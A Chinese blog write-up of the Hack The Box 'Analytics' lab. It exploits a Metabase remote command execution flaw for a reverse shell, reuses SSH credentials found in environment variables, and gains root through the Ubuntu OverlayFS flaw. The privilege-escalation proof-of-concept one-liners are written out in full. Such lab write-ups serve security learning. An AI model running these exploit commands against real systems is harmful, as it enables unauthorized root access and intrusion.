Hack The Box-Analytics

最新推荐文章于 2024-05-22 11:42:44 发布
最新推荐文章于 2024-05-22 11:42:44 发布
阅读量582 收藏 8
点赞数 12
分类专栏: HTB靶场合集 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52742680/article/details/135249475
版权

Analytics

端口扫描

在这里插入图片描述

发现存在22、80端口

端口利用

在这里插入图片描述

访问80端口,发现是一个网站,进行网站目录扫描

在这里插入图片描述

发现没有可以利用的目录,回到网站,发现存在登录的按钮

在这里插入图片描述

搜索发现存在Metabase远程命令执行漏洞(CVE-2023-38646)

在这里插入图片描述

反弹shell

上GitHub下载利用脚本https://github.com/robotmikhro/CVE-2023-38646,下载到kali后,查看利用方式为

在这里插入图片描述

本地起一个http服务,使得利用脚本时候能够下载本地的sh文件

在这里插入图片描述

编辑目录下的sh文件,使得访问该文件的时候能够反弹shell

在这里插入图片描述

本地开启9999端口监听,执行漏洞利用脚本文件

在这里插入图片描述

获取shell

在这里插入图片描述

查看当前目录内容,发现存在dockerenv,怀疑是docker容器

在这里插入图片描述

使用env命令查看当前环境

在这里插入图片描述

发现存在user和pass,尝试登录ssh

在这里插入图片描述

权限提升

查看当前用户具有的权限

在这里插入图片描述

发现不存在sudo和suid提权,查看系统版本

在这里插入图片描述

漏洞库中不存在相关漏洞,在网上寻找最新的Ubuntu漏洞:https://www.reddit.com/r/selfhosted/comments/15ecpck/ubuntu_local_privilege_escalation_cve20232640/?rdt=34791,利用方式为

在这里插入图片描述

# original poc payload
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")'

# adjusted poc payload by twitter user; likely false positive
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; u/python3 -c 'import os;os.setuid(0);os.system(\"id\")'"

依次执行上述代码后,显示结果如下

在这里插入图片描述

其中显示了root账户的id,表示存在漏洞,此处漏洞为system里的参数是以root用户身份来执行的,因此在os.system中调用nc来反弹shell,此处因为nc没有-e参数,因此选择nc mkfifo来反弹

在这里插入图片描述

在这里插入图片描述

提权成功

0415i
关注
  • 12
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Metabase 远程代码执行(CVE-2023-38646)
失心少年
07-30 486
Metabase是一款开源数据分析及可视化工具。它可允许用户连接至各种不同类型数据源,未经身份认证的攻击者可利用本漏洞在服务器上以运行 Metabase服务器的权限进行任意命令执行。
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响的 NetScaler ADC 和 NetScaler Gateway 客户尽快安装相关的更新版本。 NetScaler ADC 和 NetScaler Gateway 14.1-12.35 及更高版本 NetScaler ADC 和 NetScaler Gateway 13.1-51.15 及更高版本的 13.1 NetScaler ADC 和 NetScaler Gateway 13.0-92.21 及更高版本的 13.0 NetScaler ADC 13.1-FIPS 13.1-37.176 及更高版本的 13.1-FIPS NetScaler ADC 12.1-FIPS 12.1- 版本:Citrix ADC-13.0-92.21
【漏洞复现】Metabase 远程命令执行漏洞(CVE-2023-38646)
做自己喜欢的事,并将其发挥到极致!
08-03 3650
Metabase是美国Metabase公司的一个开源数据分析平台。Metabase是一个开源的数据分析和可视化工具,它可以帮助用户轻松地连接到各种数据源,包括数据库、云服务和API,然后使用直观的界面进行数据查询、分析和可视化。Metabase 0.46.6.1之前版本和Metabase Enterprise 1.46.6.1之前版本存在安全漏洞,该漏洞源于允许攻击者以服务器的权限级别在服务器上执行任意命令。
CVE-2023-38646:Metabase远程命令执行漏洞
MachineGunJoe666
09-05 410
Metabase是一个开源的数据分析和可视化工具,它可以帮助用户轻松地连接到各种数据源,包括数据库、云服务和API,然后使用直观的界面进行数据查询、分析和可视化。漏洞编号:CVE-2023-38646Metabase open source 0.46.6.1之前的版本和Metabase Enterprise 1.46.6.1之前的版本存在一个漏洞,允许攻击者在服务器的权限级别上执行任意命令,利用时不需要身份验证。
HackTheBoxAnalytics靶机
NSUwg的博客
11-06 245
一台新的Linux机器,在HTB官方难度为easy模式。这台机器难度比较简单 前期通过nday getshell但是那个时候 我们进去的是docker 容器里面 需要查找env配置文件得到ssh连接的账号密码。真正的拿下机器的普通用户权限。然后通过内核提权的方式进行权限提升。
HackTheBox系列-Analytics
qq_43264813的博客
12-18 837
1、使用nmap进行端口扫描2、发现目标开放了两个端口,对22和80端口进行信息收集3、扫描发现80端口绑定着一个域名analytical.htb,将其添加到hosts文件中并使用浏览器访问4、对网页进行信息收集发现一个子域名data.analytical.htb5、目录枚举半天也没有发现什么,子域名爆破也没有爆破出来其它子域名6、将发现的子域名添加到hosts文件并使用浏览器访问刚才在源码中发现的子域名,发现是一个标题为Metabase的站。
[渗透测试学习] Analytics - HackTheBox
rev1ve的博客
12-18 610
它旨在为非技术用户提供一种简单的方式来探索和分析数据,无需编写复杂的查询语句或使用复杂的分析工具。Metabase提供了一个直观的用户界面,允许用户通过简单的拖放和点击操作来创建和定制数据仪表板、报表和查询。token是刚刚得到的,然后记得修改Content-Type为json。我用的是curl本地反弹shell的sh文件,在本地开启服务。发现两个端口,22端口为ssh服务,80端口有http服务。直接ssh连接,得到user的flag。看了下其他师傅的wp,用的是内核提权。然后修改为POST请求,访问。
Hack-the-Box-OSCP-Preparation:Hack-the-Box-OSCP-Preparation
03-20
介绍你好呀!如果您不认识我,我叫Rana Khalil,然后按Twitter句柄 。在花了将近八个月的时间,攻读了Offensive Security Certified Professional(OSCP)认证后,我很高兴地宣布我已获得OSCP官方认证!...
HackTheBox-CTF-Writeups:此备忘单旨在面向CTF玩家和初学者,以帮助他们根据操作系统和难度对Hack The Box Labs进行分类
05-06
HackTheBox CTF速查表 该备忘单面向CTF玩家和初学者,可帮助他们根据操作系统和难度对Hack The Box Labs进行分类。 此列表包含hackingarticles上所有可用的Hack The Box文章。 我们已经根据我们的经验执行并编制了此...
hackthebox-writeups:HacktheBox'boot2root'计算机的编写
05-12
hackthebox撰写HacktheBox计算机(boot2root)的文章和用西班牙语或英语编写的挑战。有关密码保护的重要说明直到2020年3月的机器写入都受到相应的根标志的保护。 但是自此日期以来,HTB标志是动态的,并且对于每个...
HackTheBox靶机系列之困难Reel
04-09
主要介绍Reel靶机得整个利用过程
hackthebox注册教程
01-20
官方网址:https://www.hackthebox.eu/ hackthebox是一个靶场,听说和vulnhub很像,最近迷上了做靶场,于是就像去hackthebox看看,发现还是注册,而且注册好像还没有那么简单 在首页的最下面有个join,进行点击 发现...
Linux 生产跑批脚本解读
weixin_42081167的博客
05-20 803
生产脚本解读:定时任务、循环调用、脚本调存储过程、查询表行数判断等
selinux的安全策略可以影响ntp的方式
ALex_zry的博客
05-18 260
默认情况下,NTP使用UDP端口123进行通信,SELinux 策略需要允许NTP守护进程访问该端口。例如,可以创建一个策略,只允许受信任的NTP服务器与本地系统通信。:SELinux 提供了详细的日志和审计功能,可以帮助管理员监控和分析NTP守护进程的行为,以及检测任何潜在的安全问题。:SELinux 还可以限制NTP守护进程可以执行的操作,例如,是否可以打开套接字、是否可以读取或写入特定的设备等。:如果SELinux策略设置得太严格,可能会与NTP的正常操作发生冲突,导致NTP无法正常同步时间。
Linux echo命令(在终端输出文本)
最新发布
Dontla的博客
05-22 551
echo是Linux和Unix系统中常用的一个命令行工具,主要用于在终端输出文本。该命令非常简单,但是它在脚本编程和日常系统管理中扮演着重要的角色。
Linux|如何在 awk 中使用流控制语句
冷冻工厂
05-21 352
对于上面的形式,如果条件 1 为 true,则执行 actions1 并退出 if 语句,否则评估条件 2,如果为 true,则执行 actions2 并退出 if 语句。当您从 Awk 系列一开始回顾我们迄今为止介绍的所有 Awk 示例时,您会注意到各个示例中的所有命令都是按顺序执行的,即一个接一个。这里,该方法简单地定义为使用计数器来控制循环执行,首先需要初始化计数器,然后根据测试条件运行它,如果为真,则执行操作,最后递增计数器。条件是一个 Awk 表达式,操作是条件为真时执行的 Awk 命令行。
Linux】-Zookeeper安装部署[17]
weixin_63106307的博客
05-20 553
除了为Hadoop和Hbase提供协调服务外,ZooKeeper也被其他软件采用作为其分布式状态一致性的依赖,比如Kafka,又或者一些软件项目中,也经常能见到ZooKeeper作为一致性协调服务存在。10、【在node1、node2、node3上分别执行】启动zookeeper。11、【在node1、node2、node3上分别执行】检查zookeeper。7、【node1上操作】 将zookeeper 复制到node2和node3。2、【node1上操作】下载ZooKeeper安装包,并解压。
LinuxLinux下centos更换国内yum源
青竹雾色间.的博客
05-21 451
通过执行以上步骤,你就已经成功地将 CentOS 7.6 中的国外 YUM 源更改为国内源。
Linux】:进程状态
Yikefore的博客
05-18 880
操作系统层面的进程状态与Linux中具体的进程状态详细介绍!
hackthebox - reel
11-03
HackTheBox - Reel是一个在黑客社区非常受欢迎的虚拟机靶场。这个靶场的目标是通过渗透测试和攻击手法,找到并获得系统的管理员权限。靶场基于漏洞存在和网络安全问题,提供了一个真实的环境来练习和提升安全技能。 Reel虚拟机是以恶意软件传播为主题的,这是一个很常见但危险的网络攻击。在解决这个靶场时,你需要进行全面的信息搜集,发现可能的漏洞,并利用这些漏洞来控制系统。你还需要进行各种网络嗅探和流量分析操作,以便找到系统中的隐藏服务和登录凭证。 在攻击过程中,你需要利用各种漏洞包括未经授权的访问和远程执行代码等。还需要理解和使用不同的入侵技术,例如命令注入和文件上传等。此外,你可能还需要对恶意软件的分析和行为进行深入研究,以了解其运行机制。 HackTheBox - Reel不仅测试了你的渗透测试技能,而且还促使你加强对恶意软件攻击和防护的了解。同时,这个靶场还有很多高级技术和技巧需要掌握。通过挑战这样的虚拟机,你可以提高你的安全意识和技能,以应对更复杂和高级的网络攻击。 总之,HackTheBox - Reel是一个非常有挑战性的虚拟机靶场,通过攻击和渗透测试,你将提高你的安全技能,并了解到如何防范和对抗恶意软件传播。这是一个很好的方式来锻炼和提升你的网络安全技术。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值